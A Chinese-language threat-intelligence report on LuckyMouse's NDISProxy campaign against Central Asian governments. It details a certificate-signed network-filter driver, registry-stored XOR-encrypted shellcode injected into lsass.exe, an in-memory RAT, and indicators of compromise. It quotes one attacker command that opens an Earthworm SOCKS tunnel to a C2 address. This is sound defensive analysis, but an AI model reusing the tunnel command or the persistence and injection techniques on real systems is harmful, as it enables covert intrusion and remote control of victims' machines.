LuckyMouse使用中國IT公司的證書籤署惡意NDISProxy驅動程式
一、前言
自2018年3月以來,我們發現了幾例感染,在這些感染中未知的特洛伊木馬被注入lsass.exe系統程序記憶體。這些植入程式由擁有合法數字簽名的32位和64位網路過濾驅動程式NDISProxy注入。有趣的是,這個驅動程式是使用屬於中國的公司LeagSoft的數字證書籤署的,LeagSoft是一家位於廣東深圳的資訊保安軟體開發商。我們通過CN-CERT向公司通報了這個問題。
本報告中描述的活動在中亞高層會議召開之前就已經開始,我們認為幕後的行動者仍然關注地區政治。
二、惡意模組
惡意軟體包含三個不同的模組:
·自定義C ++安裝程式解密並釋放驅動程式檔案至相應的系統目錄,為驅動程式永續性建立Windows自動執行服務,並將加密的記憶體中特洛伊木馬新增到系統登錄檔中。
·網路過濾驅動程式(NDISProxy),用於解密並將特洛伊木馬注入記憶體並過濾埠3389(遠端桌面協議,RDP)流量,以便將特洛伊木馬的C2通訊插入其中。
·最後階段的C ++特洛伊木馬作為HTTPS伺服器,與驅動程式一起工作。通過埠3389和443兩個可能的通訊通道被動地等待來自其C2的通訊。
安裝程式設定完所有模組後,NDISProxy驅動程式和RAT一起工作
這些模組允許攻擊者在受感染的基礎架構中靜默橫向移動,但如果新的受感染主機僅具有LAN IP,則不允許它們與外部C2通訊。因此,運營商使用Earthworm SOCKS隧道將受感染主機的LAN連線到外部C2。他們還使用Scanline網路掃描程式查詢檔案共享(埠135,伺服器訊息塊,SMB),用於通過管理員密碼傳播惡意軟體,並記錄鍵盤操作。
我們高度自信的認為NDISProxy是LuckyMouse使用的新工具。卡巴斯基實驗室產品可檢測所描述的樣本。獲取更多資訊,請聯絡: ofollow,noindex" target="_blank">[email protected]
三、傳播
到2018年3月底,我們在不同的目標中檢測到了用於此活動的32位dropper的分佈情況。但是,我們沒有觀察到任何魚叉式網路釣魚或水坑活動。我們認為運營商通過已經受到控制的網路傳播他們的感染程式。
四、工作原理
1.自定義安裝程式
初始感染程式是32位可移植可執行檔案,能夠根據目標安裝32位或64位驅動程式。安裝程式會在同一目錄中的load.log檔案中記錄所有安裝過程步驟。它檢查作業系統是否為Windows Vista或更高版本(主要版本等於或大於6),並使用DES(資料加密標準)演算法解密其初始配置。
配置中的一組眾所周知的埠號(HTTP,HTTPS,SMB,POP3S,MSSQL,PPTP和RDP)並沒有使用,這與訊息中的“[test]”字串一起表明此惡意軟體仍處於開發階段。
安裝程式建立訊號量(名稱取決於配置)Global\Door-ndisproxy-mn並檢查服務(名稱還取決於配置)是否已安裝ndisproxy-mn。如果是,則dropper在load.log中寫入“檢測到door”。執行NDISProxy的自動執行Windows服務是開發人員術語中的“door”。
安裝程式還解密(使用相同的DES)最後一個階段特洛伊木馬的shellcode,並將其儲存HKLM\SOFTWARE\Classes\32ndisproxy-mn(或64ndisproxy-mn適應於64位主機)下的三個登錄檔值中,名為xxx0,xxx1,xxx2。加密配置儲存在登錄檔項HKCR\ndisproxy-mn下的值filterpd-ndisproxy-mn。
初始安裝程式在系統登錄檔中儲存XOR加密的特洛伊木馬程式的shellcode和DES加密配置
安裝程式會建立相應的自動啟動服務和登錄檔項。“Altitude”登錄檔值(minifilter驅動程式的唯一ID)設定為321 000,表示Windows中的FSFilter Anti-Virus:
2.NDISProxy網路過濾驅動
這個數字簽名的驅動程式是此活動中使用的最有趣的程式。網路過濾模組有兩個目的:首先解密並注入RAT;第二,通過RDP埠3389設定其通訊通道。
該驅動程式使用VeriSign向LeagSoft頒發的數字證書進行簽名,LeagSoft是一家開發資料丟失防護(DLP)解決方案等資訊保安軟體的公司。
該驅動程式廣泛使用第三方公開可用的C原始碼,包括GitHub上提供的Blackbone儲存庫。
驅動程式再次檢查Windows版本是否高於Vista,然後建立名為\\Device\\ndisproxy-%s的裝置(其中“ – ”之後的單詞各不相同,請參閱所有變體的附錄)及其對應的符號連結
\\DosDevices\\Global\\ndisproxy-%s。
該驅動程式結合了HKLM\SOFTWARE\Classes\32ndisproxy-mn中所有與木馬相關的登錄檔值,並使用六位元組硬編碼值對它們進行XOR。然後,它使用Blackbone庫函式將生成的特洛伊木馬可執行shellcode注入lsass.exe記憶體。
NDISProxy用作網路流量過濾器引擎,過濾通過RDP埠3389的流量(埠號是硬編碼的)並向其中注入訊息。
使用者模式記憶體中的特洛伊木馬與驅動程式之間的通訊將通過DeviceIoControl Windows API函式編寫的自定義控制程式碼。除輔助程式碼外,還有兩個程式碼值得一提:
3.記憶體C++ Trojan
請注意,此特洛伊木馬程式僅存在於記憶體中;上面的資料是針對解密的Windows登錄檔內容而沒有包括初始shellcode
此RAT由NDISProxy驅動程式從系統登錄檔解密並注入lsass.exe程序記憶體。程式碼以shellcode開頭 – 而不是典型的Windows可移植可執行檔案Loader,此惡意軟體本身實現了記憶體對映。
該特洛伊木馬是一個功能齊全的RAT,能夠執行命令執行和下載/上傳檔案等常見任務。這是通過幾十個C ++類實現的,例如CMFile,CMFile,CMProcess,TFileDownload,TDrive,TProcessInfo,TSock等。第一階段自定義安裝程式使用相同的類。該木馬使用HTTP Server API在埠443上過濾HTTPS資料包並解析命令。
特洛伊木馬是一個HTTP伺服器,允許LAN連線。它使用SOCKS隧道器與C2通訊
攻擊者使用此特洛伊木馬來收集目標資料,進行橫向移動並使用Earthworm隧道建立到其C2的SOCKS隧道。這個工具是公開的,在攻擊者中很受歡迎。鑑於特洛伊木馬本身就是一個HTTPS伺服器,我們認為SOCKS隧道用於沒有外網IP的目標,因此C2能夠傳送命令。
五、幕後
我們發現此活動針對的是中亞政府。我們認為這次襲擊具有很強的針對性,與高級別會議有關。我們高度自信的認為LuckyMouse攻擊者使用本報告中描述的NDISProxy工具開展此次新攻擊行動。
特別是,Earthworm隧道的選擇對於攻擊者來說是典型的。此外,攻擊者使用的命令之一(“-s rssocks -d 103.75.190 [。] 28 -e 443”)建立到先前已知的LuckyMouse C2的隧道。此活動中受害者的選擇也與攻擊者所表現出的先前興趣一致。
六、契合當前趨勢
我們觀察到幾個攻擊活動逐漸轉向公開可用工具(如Metasploit或CobaltStrike)和自定義惡意軟體(如本報告中描述的最後階段C ++RAT)的組合。我們還觀察了不同的參與者如何定期從GitHub儲存庫中採用程式碼。所有這些結合起來使歸因更加困難。
此活動再次證明了LuckyMouse對中亞的興趣以及關注上海合作組織的政治議程。
IoC
檔案Hashes
Droppers-installers
9dc209f66da77858e362e624d0be86b3
dacedff98035f80711c61bc47e83b61d
驅動
8e6d87eadb27b74852bd5a19062e52ed
d21de00f981bb6b5094f9c3dfa0be533
a2eb59414823ae00d53ca05272168006
493167e85e45363d09495d0841c30648
ad07b44578fa47e7de0df42a8b7f8d2d
Auxiliary Earthworm SOCKS隧道工具及Scanline
83c5ff660f2900677e537f9500579965
3a97d9b6f17754dcd38ca7fc89caab04
Domains and IPs
103.75.190[.]28
213.109.87[.]58
訊號
Global\Door-ndisproxy-mn
Global\Door-ndisproxy-help
Global\Door-ndisproxy-notify
服務
ndisproxy-mn
ndisproxy-help
ndisproxy-notify
登錄檔鍵值
HKLM\SOFTWARE\Classes\32ndisproxy-mn
HKLM\SOFTWARE\Classes\64ndisproxy-mn
HKCR\ndisproxy-mn\filterpd-ndisproxy-mn
HKLM\SOFTWARE\Classes\32ndisproxy-help
HKLM\SOFTWARE\Classes\64ndisproxy-help
HKCR\ndisproxy-mn\filterpd-ndisproxy-help
HKLM\SOFTWARE\Classes\32ndisproxy-notify
HKLM\SOFTWARE\Classes\64ndisproxy-notify
HKCR\ndisproxy-mn\filterpd-ndisproxy-notify
驅動的簽名證書
許多合法的LeagSoft產品都使用以下證書進行簽名。請不要將所有簽名檔案視為惡意檔案。